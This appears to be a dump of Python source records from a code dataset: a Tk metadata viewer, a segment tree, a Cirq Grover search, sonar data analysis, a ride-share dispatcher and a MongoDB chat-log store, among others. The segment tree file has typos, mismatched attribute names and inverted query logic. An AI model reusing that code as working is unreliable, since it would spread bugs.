rowspan=2);\n\t\treturn 1;\n\tlabel = Label(curr, text=text, font=13);\n\tlabel.grid(row=1, column=1, rowspan=2);\n\tif src == \"\":\n\t\ttext = \"You may select a file first!\";\n\telse:\n\t\ttext = \"File path is incorrect!\";\n\tlabel = Label(curr, text=text, padx=20 ,justify=\"left\");\n\tlabel.grid(row=3, column=1);\n\n##\n# Files the tab\n##\ndef tab_fill(t, buffer):\n\tif t == \"exif\":\n\t\tcurr = tabExif;\n\telif t == \"xmp\":\n\t\tcurr = tabXmp;\n\telif t == \"iptc\":\n\t\tcurr = tabIptc;\n\telse:\n\t\treturn 0;\n\ty = 3;\n\tif buffer is not None:\n\t\tfor value in buffer:\n\t\t\tlabel = Label(curr, text=value.replace(\".\",\" \"), justify=\"left\");\n\t\t\tlabel.grid(row=y, column=1);\n\t\t\tlabel = Entry(curr);\n\t\t\tlabel.name = value;\n\t\t\tlabel.insert(0, buffer[value]);\n\t\t\tlabel.grid(row=y, column=2, pady=3, padx=3);\n\t\t\ty += 1;\n\n##\n# GUI properly speaking\n##\n\n#Let's create the GUI\n## Window\nwindow = Tk();\nwindow.title(\"EXIF-IPTC-XMP Viewer\");\nwindow.geometry(\"900x700+200+50\");\n\n## Tabs\ntabManager = Notebook(window);\n\n## Inner Frames\nleft = Frame(window);\ntabExif = Frame(tabManager);\ntabIptc = Frame(tabManager);\ntabXmp = Frame(tabManager);\n\n## Adding tabs to tab_bar\ntabManager.add(tabExif, text=\"EXIF\");\ntabManager.add(tabIptc, text=\"IPTC\");\ntabManager.add(tabXmp, text=\"XMP\");\n\n## Title-label\ntitle = Label(left, text=\"EXIF-IPTC-XMP Viewer\", pady=\"10px\", font=13);\ntitle.pack();\n\n## Adding Frames\nleft.pack(side=\"left\", fill=\"both\", expand=0, padx=10);\ntabManager.pack(fill=\"both\", side=\"right\", expand=1);\n\n# LEFT SIDE\nphoto = ImageTk.PhotoImage( Image.open(\"blank.png\") );\nimageBox = Label(left, image=photo);\nimageBox.pack();\n\n## File name label\ntext = \"File name : \";\nlabel = Label(left, text=text);\nlabel.pack();\nsrcEntry = Label(left, text=\"Please select one.\");\nsrcEntry.pack();\n\n## Active Button\nopenButton = Button(left, text=\"Open Image\");\nopenButton.pack(fill=\"x\", padx=\"10px\", pady=\"3px\");\n\n## Active Button\napplyButton = Button(left, text=\"Apply Changes\");\n'''applyButton.pack(fill=\"x\", padx=\"10px\", pady=\"3px\");'''\n\n# EXIF TAB\ntab_init(\"xmp\");\ntab_init(\"exif\");\ntab_init(\"iptc\");\n\n\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"53870827","text":"\nimport sys\nimport glob\nimport re\n\n\ndef simplify_credits(html):\n \"\"\"\n Replace the credit part of the HTML footer. Return the new text.\n \"\"\"\n s = r\"Created using <a href=\\\"https://www\\.sphinx.+?Furo theme</a>.\"\n pattern = re.compile(s, flags=re.DOTALL)\n\n new_s = '<a href=\"https://creativecommons.org/licenses/by/4.0/\">CC BY 4.0</a>'\n new_s += ' | Created using Sphinx & Furo'\n\n return pattern.sub(new_s, html)\n\ndef main(path):\n \"\"\"\n Process the HTML files in path, save in place (side-effect).\n \"\"\"\n fnames = glob.glob(path.strip('/') + '/*.html')\n for fname in fnames:\n with open(fname, 'r+') as f:\n html = f.read()\n\n new_html = simplify_credits(html)\n\n f.seek(0)\n f.write(new_html)\n f.truncate()\n return\n\n\nif __name__ == '__main__':\n _ = main(sys.argv[1])\n","sub_path":"docs/post_process_html.py","file_name":"post_process_html.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"320174486","text":"\nclass SegementTreeNode(object):\n\n def __init__(object, begin, end):\n self.val = 0\n self.begin = begin\n self.end = end\n self.left = None\n self.right = None\n\n\nclass SegementTree(object):\n\n def __init__():\n pass\n\n def buildSegmentTree(self, l, begin, end):\n if begin == end:\n node = SegementTreeNode(bgin, end)\n node.val = l[begin]\n return node\n\n node = SegementTreeNode(begin, end)\n mid = (begin + end) // 2\n node.left = self.buildSegmentTree(l, begin, mid)\n node.right = self.buildSegmentTree(l, mid + 1, end)\n node.val = node.left.val + node.right.val\n\n return node\n\n def updateVal(self, node, i, val):\n if node.start == node.end:\n node.val = val\n else:\n mid = int((node.start + node.end) / 2)\n\n if i <= mid:\n self.updateVal(node.left, i, val)\n\n if i > mid:\n self.updateVal(node.right, i, val)\n\n node.val = node.left.val + node.right.val\n\n def update(self, i, val):\n self.updateVal(self.segTreeHead, i, val)\n\n def getSum(self, node, begin, end):\n if not node or node.begin < begin or node.end > end:\n return 0\n\n if node.begin == begin and node.end == end:\n return node.val\n\n mid = (node.begin + node.end) // 2\n\n if mid >= begin:\n return self.getSum(node.right, begin, end)\n\n if end <= mid:\n return self.getSum(node.left, begin, end)\n\n return self.getSum(node.left, begin, mid) + self.getSum(node.right, mid + 1, end)\n","sub_path":"CCI/3/segmentTree.py","file_name":"segmentTree.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"360138618","text":"from typing import List\n\nimport numpy as np\nfrom nltk import tokenize\n\nfrom .word import WordVector\nfrom .idf import Idf\n\n\nclass SentenceVector:\n def __init__(self):\n self.word_model = WordVector()\n\n def get_vecs(self, sentences: List[str]) -> np.array:\n idf_model = Idf(sentences)\n result = []\n for sent in sentences:\n word_vecs = []\n for word in tokenize.word_tokenize(sent):\n vec = self.word_model.get_vec(word)\n idf = idf_model.get_idf(word)\n if vec is not None and idf is not None:\n vec = vec * idf\n word_vecs.append(vec)\n result.append(np.mean(np.array(word_vecs), axis=0))\n return np.array(result)\n","sub_path":"src/embedding/sentence.py","file_name":"sentence.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"344767194","text":"from driver import Driver\nfrom rider import Rider\n\n\nclass Dispatcher:\n \"\"\"A dispatcher fulfills requests from riders and drivers for a\n ride-sharing service.\n\n When a rider requests a driver, the dispatcher assigns a driver to the\n rider. If no driver is available, the rider is placed on a waiting\n list for the next available driver. A rider that has not yet been\n picked up by a driver may cancel their request.\n\n When a driver requests a rider, the dispatcher assigns a rider from\n the waiting list to the driver. If there is no rider on the waiting list\n the dispatcher does nothing. Once a driver requests a rider, the driver\n is registered with the dispatcher, and will be used to fulfill future\n rider requests.\n \"\"\"\n # === Private Attributes ===\n # @type _events: PriorityQueue[Event]\n # A sequence of events arranged in priority determined by the event\n # sorting order.\n # @type _dispatcher: Dispatcher\n # The dispatcher associated with the simulation.\n\n def __init__(self):\n \"\"\"Initialize a Dispatcher.\n\n @type self: Dispatcher\n @rtype: None\n \"\"\"\n self._riders_waitlist = []\n self._available_drivers = []\n\n def __str__(self):\n \"\"\"Return a string representation.\n\n @type self: Dispatcher\n @rtype: str\n\n # Examples cannot be provided for the docstring because the location\n # module is not imported.\n \"\"\"\n return (\"Riders waiting list: {}, \"\n \"Available drivers: {}\").format(self._riders_waitlist,\n self._available_drivers)\n\n def request_driver(self, rider):\n \"\"\"Return a driver for the rider, or None if no driver is available.\n\n Add the rider to the waiting list if there is no available driver.\n\n @type self: Dispatcher\n @type rider: Rider\n @rtype: Driver | None\n\n # Examples cannot be provided for the docstring because the location\n # module is not imported.\n \"\"\"\n\n\n closest_driver = None\n # if no driver was found then add the rider to waitlist and return None.\n if len(self._available_drivers) == 0:\n self._riders_waitlist.append(rider)\n\n for driver in self._available_drivers:\n # if the the closest_driver is None then set it the closest_driver\n # to the first driver from the available_drivers list. If not\n # then find the closest driver(A.K.A fastest).\n if driver == self._available_drivers[0]:\n closest_driver = driver\n elif (driver.is_idle and\n driver.get_travel_time(rider.origin) <\n closest_driver.get_travel_time(rider.origin)):\n\n closest_driver = driver\n return closest_driver\n\n def request_rider(self, driver):\n \"\"\"Return a rider for the driver, or None if no rider is available.\n\n If this is a new driver, register the driver for future rider requests.\n\n @type self: Dispatcher\n @type driver: Driver\n @rtype: Rider | None\n\n # Examples cannot be provided for the docstring because the location\n # module is not imported.\n \"\"\"\n if driver not in self._available_drivers:\n self._available_drivers.append(driver)\n if len(self._riders_waitlist) > 0:\n # you remove the longest-waiting rider.\n return self._riders_waitlist.pop(0)\n return None\n\n def cancel_ride(self, rider):\n \"\"\"Cancel the ride for rider.\n\n @type self: Dispatcher\n @type rider: Rider\n @rtype: None\n\n # Examples cannot be provided for the docstring because the location\n # module is not imported.\n \"\"\"\n if rider in self._riders_waitlist:\n self._riders_waitlist.remove(rider)\n","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631874046","text":"import numpy as np\nimport cirq\n\nclass Grover:\n def __init__(self, n):\n self.n = n # Number of qubits\n self.index = 1#np.random.randint(pow(2, n)) # Choose random number in [0, 2^n) which is regarded as the \"solution\"\n self.qubits = cirq.LineQubit.range(2 * self.n) # All qubits\n self.q = self.qubits[0:self.n] # Grover work qubits\n self.a = self.qubits[self.n:self.n + 1] # Grover ancilla qubit\n self.t = self.qubits[self.n + 1:2 * self.n] # Toffoli ancilla qubits\n self.simulator = cirq.Simulator()\n self.measurement_reps = 1000\n\n def multi_toffoli(self, qins, qout, controls=None):\n # Array containing whether i-th qubit should have a 0-control (i.e. added X gates) or 1-control\n if controls is None: controls = np.ones(self.n) # If none specified, use default 1-controls\n\n G = []\n Xgates = []\n Cgates = []\n\n for i in range(len(qins)):\n if controls[i] == 0: Xgates.append(cirq.X.on(qins[i]))\n\n if len(qins) > 1: Cgates.append(cirq.TOFFOLI.on(qins[0], qins[1], self.t[0]))\n for i in range(2, len(qins)):\n Cgates.append(cirq.TOFFOLI.on(qins[i], self.t[i - 2], self.t[i - 1]))\n #for i in range(2, len(qins) - 1):\n # Cgates.append(cirq.TOFFOLI.on(qins[i], self.t[i - 2], self.t[i - 1]))\n\n G.append(Xgates)\n G.append(Cgates)\n if len(qins) > 1:\n G.append(cirq.CNOT.on(self.t[len(qins) - 2], qout))\n #G.append(cirq.TOFFOLI.on(qins[len(qins) - 1], self.t[len(qins) - 3], qout))\n else:\n G.append(cirq.CNOT.on(qins[0], qout))\n G.append(cirq.inverse(Cgates)) # Uncompute t-registers\n G.append(Xgates)\n\n return G\n\n def oracle(self):\n index_binary = np.array(list(bin(self.index)[2:].zfill(self.n))).astype(int)\n \n return self.multi_toffoli(self.q, self.a[0], controls=index_binary)\n \n def diffusion(self):\n G = [] # Gate list\n\n for i in range(self.n):\n G.append(cirq.H.on(self.q[i]))\n\n # 0-controlled Z on all work qubits\n G.append(cirq.X.on(self.q[-1]))\n G.append(cirq.H.on(self.q[-1]))\n G.append(self.multi_toffoli(self.q[:-1], self.q[-1], controls=np.zeros(self.n)))\n G.append(cirq.H.on(self.q[-1]))\n G.append(cirq.X.on(self.q[-1]))\n\n for i in range(self.n):\n G.append(cirq.H.on(self.q[i]))\n\n return G\n \n def search(self):\n circuit = cirq.Circuit()\n \n # Grover ancilla starts in |1> state\n circuit.append(cirq.X.on(self.a[0]))\n\n for i in range(self.n):\n circuit.append(cirq.H.on(self.q[i]))\n circuit.append(cirq.H.on(self.a[0]))\n\n grover_reps = int(np.round(np.pi / 4 * np.sqrt(pow(2, self.n))))\n\n for i in range(grover_reps):\n circuit.append(self.oracle())\n circuit.append(self.diffusion())\n \n circuit.append([cirq.measure(self.q[j], key='{}'.format(j)) for j in range(self.n)])\n\n sim_result = list(self.simulator.run(circuit, repetitions=self.measurement_reps).measurements.items())\n measurements = np.hstack([r for _, r in sim_result]).astype(np.int)\n results = measurements.dot(1 << np.arange(measurements.shape[-1] - 1, -1, -1)) # Convert binary to decimal\n\n print(measurements)\n print(results)\n\n accuracy = np.sum(results == self.index) / self.measurement_reps\n\n return accuracy\n\ngrover = Grover(3)\nprint(grover.index)\nprint(cirq.Circuit(grover.oracle()))\nprint(cirq.Circuit(grover.diffusion()))\nprint(grover.search())","sub_path":"Grover/Grover/Grover.py","file_name":"Grover.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"531327626","text":"import numpy as np\nimport scipy.stats as stats\nimport urllib2\nimport sys\nimport matplotlib.pylab as pylab\nimport pandas as pd\nfrom pandas import DataFrame\nfrom random import uniform\nfrom math import sqrt\nimport matplotlib.pyplot as plot\n\n# read data from UCI url\nurl = (\"http://archive.ics.uci.edu/ml/machine-learning-databases/undocumented/connectionist-bench/sonar/sonar.all-data\")\ndata = urllib2.urlopen(url)\n\n# 2.1 sizing upa new dataset\nxList = []\nlabels = []\nfor line in data:\n row = line.strip().split(\",\")\n xList.append(row)\nsys.stdout.write(\"Number of Rows of Data = \" + str(len(xList)) + '\\n')\nsys.stdout.write(\"Number of Columns of Data = \" + str(len(xList[1])) + '\\n')\n\n# 2.2 determine the nature of attributes\nnrow = len(xList)\nncol = len(xList[1])\ntype = [0]*3\ncolCounts = []\n\nfor col in range(ncol):\n for row in xList:\n try:\n a = float (row[col])\n if isinstance(a, float):\n type[0] += 1\n except ValueError:\n if len(row[col]) > 0:\n type[1] += 1\n else:\n type[2] += 1\n colCounts.append(type)\n type = [0]*3\nsys.stdout.write(\"Col#\" + '\\t' + \"Number\" + '\\t' + \"Strings\" + '\\t ' + \"Other\\n\")\niCol = 0\nfor types in colCounts:\n sys.stdout.write(str(iCol) + '\\t\\t' + str(types[0]) + '\\t\\t' + str(types[1]) + '\\t\\t' + str(types[2]) + \"\\n\")\n iCol += 1\n\n# 2.3 Summary Statistics for numeric and categorical attributes\ncol = 3\ncolData = []\nfor row in xList:\n colData.append(float(row[col]))\ncolArray = np.array(colData)\ncolMean = np.mean(colArray)\ncolsd = np.std(colArray)\nsys.stdout.write(\"Mean = \" + '\\t' + str(colMean) + '\\t\\t' + \"Standard Deviation = \" + '\\t ' + str(colsd) + \"\\n\")\n\n#calculate quantile boundaries\nntiles = 4\npercentBdry = []\nfor i in range(ntiles+1):\n percentBdry.append(np.percentile(colArray, i*(100)/ntiles))\nsys.stdout.write(\"\\nBoundaries for 4 Equal Percentiles \\n\")\nprint(percentBdry)\nsys.stdout.write(\" \\n\")\n\n#run again with 10 equal intervals\nntiles = 10\npercentBdry = []\nfor i in range(ntiles+1):\n percentBdry.append(np.percentile(colArray, i*(100)/ntiles))\nsys.stdout.write(\"Boundaries for 10 Equal Percentiles \\n\")\nprint(percentBdry)\nsys.stdout.write(\" \\n\")\n\n#The last column contains categorical variables\ncol = 60\ncolData = []\nfor row in xList:\n colData.append(row[col])\nunique = set(colData)\nsys.stdout.write(\"Unique Label Values \\n\")\nprint(unique)\n\n#count up the number of elements having each value\ncatDict = dict(zip(list(unique),range(len(unique))))\ncatCount = [0]*2\nfor elt in colData:\n catCount[catDict[elt]] += 1\nsys.stdout.write(\"\\nCounts for Each Value of Categorical Label \\n\")\nprint(list(unique))\nprint(catCount)\n\n# 2.4 QQ plot using pylab\ncol = 3\ncolData = []\nfor row in xList:\n colData.append(float(row[col]))\nstats.probplot(colData, dist=\"norm\", plot=pylab)\npylab.title(\"Probability Plot\")\npylab.show()\n\n# 2.5 using pandas to read and summarize data\nrocksVMines = pd.read_csv(url,header=None, prefix=\"V\")\n\n#print head and tail of data frame\nprint(rocksVMines.head())\nprint(rocksVMines.tail())\n\n#print summary of data frame\nsummary = rocksVMines.describe()\nprint(summary)\n\n# 2.6 parallel coordinates graph for attributes visualization\n#assign color for M and R\nfor i in range(208):\n if rocksVMines.iat[i,60] == \"M\":\n pcolor = \"red\"\n else:\n pcolor = \"blue\"\n dataRow = rocksVMines.iloc[i,0:60]\n dataRow.plot(color=pcolor)\nplot.xlabel(\"Attribute Index\")\nplot.ylabel((\"Attribute Values\"))\nplot.show()\n\n# 2.7 cross plotting pairs of attributes\ndataCol2 = rocksVMines.iloc[:,1]\ndataCol3 = rocksVMines.iloc[:,2]\nplot.scatter(dataCol2, dataCol3)\nplot.title(\"Correlation bettween 2nd and 3rd attributes\")\nplot.xlabel(\"2nd Attribute\")\nplot.ylabel((\"3rd Attribute\"))\nplot.show()\n\ndataCol21 = rocksVMines.iloc[:,20]\nplot.scatter(dataCol2, dataCol21)\nplot.title(\"Correlation bettween 2nd and 21st attributes\")\nplot.xlabel(\"2nd Attribute\")\nplot.ylabel((\"21st Attribute\"))\nplot.show()\n\n# 2.8 correlation between classification target and real attribute\ntarget = []\nfor i in range(208):\n if rocksVMines.iat[i,60] == \"M\":\n target.append(1.0)\n else:\n target.append(0.0)\ndataRow = rocksVMines.iloc[:, 35]\nplot.scatter(dataRow, target)\nplot.xlabel(\"Attribute Value\")\nplot.ylabel(\"Target Value\")\nplot.show()\n\ntarget = []\nfor i in range(208):\n if rocksVMines.iat[i, 60] == \"M\":\n target.append(1.0 + uniform(-0.1, 0.1))\n else:\n target.append(0.0 + uniform(-0.1, 0.1))\ndataRow = rocksVMines.iloc[:, 35]\nplot.scatter(dataRow, target, alpha=0.5, s=120)\nplot.xlabel(\"Attribute Value\")\nplot.ylabel(\"Target Value\")\nplot.show()\n\n# 2.9 Pearson Correlation\n#calculate correlations between real-valued attributes\ndataRow2 = rocksVMines.iloc[0:60,1]\ndataRow3 = rocksVMines.iloc[0:60,2]\ndataRow21 = rocksVMines.iloc[0:60,20]\nmean2 = 0.0; mean3 = 0.0; mean21 = 0.0\nnumElt = len(dataRow2)\nfor i in range(numElt):\n mean2 += dataRow2[i]/numElt\n mean3 += dataRow3[i]/numElt\n mean21 += dataRow21[i]/numElt\n var2 = 0.0; var3 = 0.0; var21 = 0.0\nfor i in range(numElt):\n var2 += (dataRow2[i] - mean2) * (dataRow2[i] - mean2)/numElt\n var3 += (dataRow3[i] - mean3) * (dataRow3[i] - mean3)/numElt\n var21 += (dataRow21[i] - mean21) * (dataRow21[i] - mean21)/numElt\n corr23 = 0.0; corr221 = 0.0\nfor i in range(numElt):\n corr23 += (dataRow2[i] - mean2) * \\\n (dataRow3[i] - mean3) / (sqrt(var2*var3) * numElt)\n corr221 += (dataRow2[i] - mean2) * \\\n (dataRow21[i] - mean21) / (sqrt(var2*var21) * numElt)\nsys.stdout.write(\"Correlation between attribute 2 and 3 \\n\")\nprint(corr23)\nsys.stdout.write(\" \\n\")\nsys.stdout.write(\"Correlation between attribute 2 and 21 \\n\")\nprint(corr221)\nsys.stdout.write(\" \\n\")\n\n# 2.10 presenting attribute correlation visually\ncorMat = DataFrame(rocksVMines.corr())\n#visualize correlations using heatmap\nplot.pcolor(corMat)\nplot.show()\n\nprint(\"My name is Yuxin Sun\")\nprint(\"My NetID is: yuxins5\")\nprint(\"I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.\")\n","sub_path":"HW3.py","file_name":"HW3.py","file_ext":"py","file_size_in_byte":6105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"54959962","text":"from numpy import *\na = [[ 1., 0., 0.],\n [ 0., 1., 2.]]\na = array(a)\na.ndim\na.size\na.shape\na.dtype\na.itemsize\na.data\n\na.shape = (3,2)\na\na.transpose()\na\nNone is newaxis\n\nc = arange(12)\nc\n\nid(b)\n","sub_path":"code/nmptst.py","file_name":"nmptst.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"333021048","text":"import add_import_path # only for examples\n\nfrom aktos_dcs import *\nfrom aktos_dcs_lib import *\n\nclass Test(Actor):\n def handle_IoMessage(self, msg):\n print(\"Got message: %s\", msg[\"val\"])\n\n def action(self):\n val = False\n while True:\n sleep(2)\n print(\"sending value: %s\" % val)\n self.send({'IoMessage': {'pin_name': 'test-output-1', 'val': val}})\n val = not val\n\nif __name__ == \"__main__\":\n \"\"\"\n electrical connection:\n led.+ : rpi.gpio.2\n led.- : rpi.gnd\n button.a : rpi.gnd\n button.b : rpi.gpio.3\n \"\"\"\n\n output_pins = {\n 'test-output-1': 2,\n }\n input_pins = {\n 'test-input-1': 3,\n }\n\n for k, v in input_pins.items():\n GPIOInputActor(pin_name=k, pin_number=v, invert=True)\n\n for k, v in output_pins.items():\n GPIOOutputActor(pin_name=k, pin_number=v, initial=True)\n\n ProxyActor()\n Test()\n\n wait_all()\n\n","sub_path":"examples/rpi-led-button-example.py","file_name":"rpi-led-button-example.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297417151","text":"#! /usr/bin/env python\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport pandas as pd\nfrom ggplot import *\n\nprint(\"\"\"\nThe important columns are:\n'sample' = uniq label of the sample of the 131 considered,\n'filename' = which model of that sample\n'rmsd', = distance to native structure\n'Renergy', = Rosetta energy of that model\n'nativeFlag' = == true if fn ends with .pdb, else False\n'Entropy', = entropy calculated from (nx7) predicted marginal entropy files, once with setting many chis to szero, once just summing over all of them.\n\"\"\")\n\ndf = pd.DataFrame()\n\nfor fn in [\"Rosetta+PoPEv2_sumAllVer.pkl\", \"Rosetta+PoPEv2_nullsetzVer.pkl\", \"Rosetta+PoPEv2_nullLearnedVer.pkl\",\n \"Rosetta+PoPEv3_nullLearnedVer.pkl\", \"Rosetta+PoPEv3.2.pkl\", \"Rosetta+PoPEv4.1.pkl\"]:\n E = np.load(\"../data/\" + fn)\n\n # normalize energies,entropies\n # E[\"Renergy_nmd\"] = E.groupby('sample')[\"Renergy\"].transform(lambda x: (x - x.mean()) / x.std())\n # E[\"Entropy_nmd\"] = E.groupby('sample')[\"Entropy\"].transform(lambda x: (x - x.mean()) / x.std())\n E.reset_index(inplace=True)\n # print(E.columns)\n # print(E.head())\n E_native = E[E.nativeFlag]\n E = E[np.logical_not(E.nativeFlag)]\n E = pd.merge(E,\n E.groupby('sample').apply(lambda x: x.loc[x['rmsd'].idxmin()]), on='sample', suffixes=('', '_best'))\n\n E = pd.merge(E, E_native, on='sample', suffixes=('', '_native'))\n df = df.append(pd.DataFrame(\n {'dH_best': E.Renergy_best - E.Renergy, 'dS_best': E.Entropy_best - E.Entropy, 'filename': E.filename,\n 'ver': fn,\n 'rmsd': E.rmsd, 'rmsd_best': E.rmsd_best, 'protein': E['sample'], 'dH_native': E.Renergy_native - E.Renergy,\n 'dS_native': E.Entropy_best - E.Entropy, 'rmsd_native': E.rmsd_native}))\n\nfor i in range(10):\n df = df.append(pd.DataFrame(\n {'dH_best': E.Renergy_best - E.Renergy, 'dS_best': np.random.randn(len(E.Renergy_best)), 'filename': E.filename,\n 'ver': 'rand{}'.format(i), 'rmsd': E.rmsd, 'rmsd_best': E.rmsd_best, 'protein': E['sample'],\n 'dH_native': E.Renergy_native - E.Renergy,\n 'dS_native': np.random.randn(len(E.Renergy_best)), 'rmsd_native': E.rmsd_native}))\n\ndf.reset_index(inplace=True)\np = ggplot(aes(x='dH_native', y='dS_native', colour='ver'), data=df) + \\\n geom_point(alpha=0.5, size=20) + theme_bw() + stat_smooth(method=\"loess\", span=0.1)\nprint(p)\n\ndf = df[df.dH != 0]\ndf.reset_index(inplace=True)\np = ggplot(aes(x='dH_best', y='dS_best', colour='ver'), data=df) + \\\n geom_point(alpha=0.5, size=20) + theme_bw() + stat_smooth(method=\"loess\", span=0.1)\nprint(p)\n\ndf.reset_index(inplace=True)\n\ngrouped = df.groupby(['protein', 'ver'])\n\n\ndef find_optimal_temperature(df3):\n df3 = df3.copy()\n df3['alpha'] = np.arctan(df3.dS_native / df3.dH_native)\n df3['sign'] = np.sign(df3.dH_native)\n df3.sort_values(by='alpha', ascending=False, inplace=True)\n df3 = df3.assign(disc=df3['sign'].cumsum() + sum(df3['sign'] < 0))\n idx_max = df3['disc'].idxmax()\n idx_min = df3['disc'].idxmin()\n disc_max = df3.loc[idx_max, 'disc']\n disc_min = df3.shape[0] - df3.loc[idx_min, 'disc']\n res = pd.DataFrame(\n dict(alpha=[df3.loc[idx_max, 'alpha']], disc=disc_max) if disc_max > disc_min else\n dict(alpha=[df3.loc[idx_min, 'alpha'] + np.pi], disc=disc_min))\n res['of'] = df3.shape[0]\n res['f'] = res.disc / res.of\n return res\n\n\ndf2 = grouped.apply(find_optimal_temperature).reset_index()\n\nggplot(df2, aes(x='ver', y='alpha')) + geom_point()\n\ndf2.groupby('ver')['f'].mean()\ndf2.groupby(['ver'])['f'].aggregate(lambda x: np.mean(np.equal(x, 1.0))).reset_index()\ndf2.groupby(['ver'])['f'].aggregate(lambda x: np.sum(np.equal(x, 1.0))).reset_index()\n\nimport seaborn as sns\n\ndf2['alpha'] -= (df2['alpha'] > 1.5) * np.pi\nsns.boxplot(x=\"ver\", y=\"alpha\", data=df2)\n","sub_path":"load_test_protein_data.py","file_name":"load_test_protein_data.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"201578495","text":"from programr.config.bot.mongodbstorage import BotConversationsMongodbStorageConfiguration\nfrom programr.dialog.storage.base import ConversationStorage\nfrom programr.utils.logging.ylogger import YLogger\nimport datetime\nimport pymongo\nfrom pymongo import MongoClient, IndexModel\n\n\nclass ConversationMongodbStorage(ConversationStorage):\n\n def __init__(self, config: BotConversationsMongodbStorageConfiguration):\n super().__init__(config)\n # client = MongoClient(\"10.0.75.2\", 27017)\n client = MongoClient(config.host, config.port, serverSelectionTimeoutMS=2000)\n self._config = config\n\n try:\n if not config.name in client.list_database_names():\n YLogger.info(self, \"Database doesn't exist make a new one!\")\n print(\"Database doesn't exist make a new one!\")\n\n self.db = client[config.name]\n except:\n YLogger.warning(self, \"No Mongo Database was found. No conversation will be saved\")\n print(\"No Mongo Database was found. No conversation will be saved\")\n\n def save_conversation(self, client_context):\n userid = client_context.userid\n bot_properties = client_context.bot.conversations[userid].properties\n questions = client_context.bot.conversations[userid].questions\n answers = client_context.bot.conversations[userid].answers\n\n try:\n last_question = questions[-1].sentences\n except Exception as e:\n YLogger.exception(self, \"question sentences length is zero\", e)\n raise e\n\n try:\n last_sentiment_value = client_context.bot.sentiment.last_sentiment_value\n except Exception as e:\n # print(\"Exception caught for last_sentiment_value: {}\".format(e))\n last_sentiment_value = None\n\n try:\n last_fer_value = client_context.bot.facial_expression_recognition.last_fer_value\n except Exception as e:\n # print(\"Exception caught for last_fer_value: {}\".format(e))\n last_fer_value = None\n\n try:\n last_final_sentiment_value = client_context.bot.sentiment.last_final_sentiment_value\n except Exception as e:\n # print(\"Exception caught for last_final_sentiment_value: {}\".format(e))\n last_final_sentiment_value = None\n\n try:\n # todo this doesn't handle good when sentence is empty\n last_answer = answers[-1].sentences\n except Exception as e:\n YLogger.exception(self, \"answer sentences length is zero\", e)\n raise e\n\n try:\n image_filename = answers[-1].robot[0]['robot']['image']['filename']\n except Exception as e:\n image_filename = None\n\n try:\n duration = answers[-1].robot[0]['robot']['image']['duration']\n except Exception as e:\n duration = None\n\n try:\n video_filename = answers[-1].robot[0]['robot']['video']['filename']\n except Exception as e:\n video_filename = None\n\n try:\n session_number = bot_properties[\"session_number\"]\n except Exception as e:\n session_number = None\n\n try:\n username = bot_properties[\"username\"]\n except Exception as e:\n username = None\n\n question_sentence_text, answer_sentence_text = self.create_conversation(last_question, last_answer)\n\n # print(\"last sentiment: \", last_sentiment_value)\n # print(\"final_sentiment_value: \", last_final_sentiment_value)\n\n document = {\"conversation\": {\n \"question\": question_sentence_text,\n \"answer\": answer_sentence_text,\n \"timestamp\": datetime.datetime.now(),\n \"sentiment\": last_sentiment_value,\n \"fer\": last_fer_value,\n \"final_sentiment_value\": last_final_sentiment_value\n },\n\n \"session_info\": {\n \"session_number\": session_number,\n \"username\": username\n },\n\n \"image\": {\n \"filename\": image_filename,\n \"duration\": duration,\n },\n\n \"video\": {\n \"filename\": video_filename\n }\n\n }\n try:\n # writing to db\n self.db[self._config.collection_name].insert_one(document)\n except Exception as e:\n YLogger.error(self, e)\n\n def save_client_properties(self, client_context):\n # TODO: save client_context.bot.conversations[userid].properties to MongoDB document\n userid = client_context.userid\n bot_properties = client_context.bot.conversations[userid].properties\n print(\"bot_properties: {}\".format(type(bot_properties)))\n\n if self.db['user_info'].find_one({'userid': client_context.userid}) is not None:\n print(\"Found user\")\n # user_info = self.db['user_info'].find_one({'userid': client_context.userid})\n\n self.db['user_info'].update_one({'userid': client_context.userid}, { '$set': {'variables': bot_properties} })\n print(\"Finished saving info\")\n else:\n print(\"user not found. nothing saved.\")\n\n def load_client_properties(self, client_context):\n try:\n if self.db['user_info'].find_one({'userid': client_context.userid}) is not None:\n # print(\"Found user\")\n user_info = self.db['user_info'].find_one({'userid': client_context.userid})\n # print(\"user name: {}\".format(user_info['name']))\n # print(\"user location: {}\".format(user_info['location']))\n # print(\"user time zone: {}\".format(user_info['time zone']))\n client_context.load_client_properties(user_info['name'], user_info['location'], user_info['time zone'])\n # self.user_name = user_info['name']\n # self.location = user_info['location']\n # self.time_zone = user_info['time zone']\n else:\n # print(\"Writing new user to database\")\n document = {\n \"userid\": client_context.userid,\n \"name\": \"Unknown\",\n \"location\": \"Unknown\", \n \"time zone\": \"Unknown\"\n }\n # self.db['user_info'].insert_one(document)\n # return user_info\n except Exception as e:\n YLogger.error(self, e)\n\n def load_conversation(self, conversation, clientid, restore_last_topic=False):\n # todo needs loading the whole conversation with properties\n # needs more work\n pass\n\n def empty(self):\n self.db[self._config.collection_name].drop()\n\n def 